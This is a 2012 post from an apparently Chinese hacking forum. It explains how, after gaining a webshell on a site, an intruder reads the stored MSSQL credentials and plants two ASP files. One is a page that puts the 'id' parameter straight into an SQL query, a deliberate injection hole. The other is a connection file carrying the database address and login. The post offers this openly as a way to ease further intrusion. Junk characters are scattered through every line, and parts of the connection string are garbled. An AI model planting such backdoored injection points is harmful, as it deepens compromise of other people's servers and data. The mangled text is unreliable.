找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1869|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
! S1 p2 y& r- t/ r
, c, O6 i. b. @) B$ W8 t+ t- \今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息# p# `0 Q/ b; Y# c

/ d% W$ p8 Y6 M2 h/ H这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!! Y! G8 t+ h$ z# {+ @7 n2 f

* |( ]6 a' l1 X/ o; A# @- U首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
, a- ?& d  @: k9 F! m' e# o; ?; B8 s1 X& I: N( s
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
2 l  }2 ]: I/ s' `2 W9 [# g
( Q; e; ]4 S, }$ d+ W0 P因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
9 S- j0 _  {# O8 |
* C2 [8 A. o* Q' z8 a8 J程序代码
; u% |4 S6 n6 h; a1 X<!--#include file="xx.asp"-->
- H$ O0 H+ R0 e/ G! D( E& j. P7 }: f% I<%
  b/ ]  w8 T( h5 kset rs=server.createobject("ADODB.recordset")! y% R  J5 i# \4 Z/ I  ~
id = request("id")
6 h0 A/ ?9 P7 R7 lstrSQL = "select * from admin where id=" & id
, M0 ^* y- Q4 g: I1 T# }2 n# Vrs.open strSQL,conn,1,3( p. y3 O/ P" `0 p% M
rs.close9 K2 p1 |' S7 v% [' V
%>
: i+ i/ s* T$ f% h) u5 D+ U: |4 Y' t
9 _# S9 i; L/ p% [3 b/ z2 i- b把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
" y3 |% a) Q, Y% ?" x& {' z' \: G9 s% `
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!+ v5 s6 Y+ ^" N5 e, S4 s
1 |2 O: T2 ?& u+ k/ m! k+ x
然后就要构造一个连接数据库的文件了,代码如下:/ q3 W# s, O9 M. W8 {: _! ?
程序代码* W( j( Q- z- o
<%        
/ ]' M% D% l( FstrSQLServerName = "000.000.000.000"     '服务器名称或地址
! l0 M2 i  M/ \9 ~strSQLDBUserName = "sqlname"         '数据库帐号
8 f+ t( k: p9 A( h4 x" estrSQLDBPassword = "sqlpass"         '数据库密码& c  f0 L2 z# L. b5 `; V7 G
strSQLDBName = "sqldataname"           '数据库名称+ v7 f, S( f& ]7 r1 O7 X, |
Set conn = Server.CreateObject("ADODB.Connection")+ g& @4 Q+ j6 X6 |$ e* ^- U% x
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
$ P) [3 W4 A( Z! n$ y2 d$ ^- U6 Oconn.open strCon8 e0 n" u9 `& e* n9 {: C5 O) J$ _
%>& ^; b: R6 u  i! l; L& j! L

0 L+ p6 T- P* W' N' g8 X4 d这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,) ?% [5 e# H' M; O

. h7 O; r8 l7 t9 M' P+ |4 P! B: j2 ~就这样,正常情况下,就OK了,伪造成功……
0 T6 i" e1 F( f! a& [$ |0 J
2 ?  _4 z$ B. B, n( ?           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表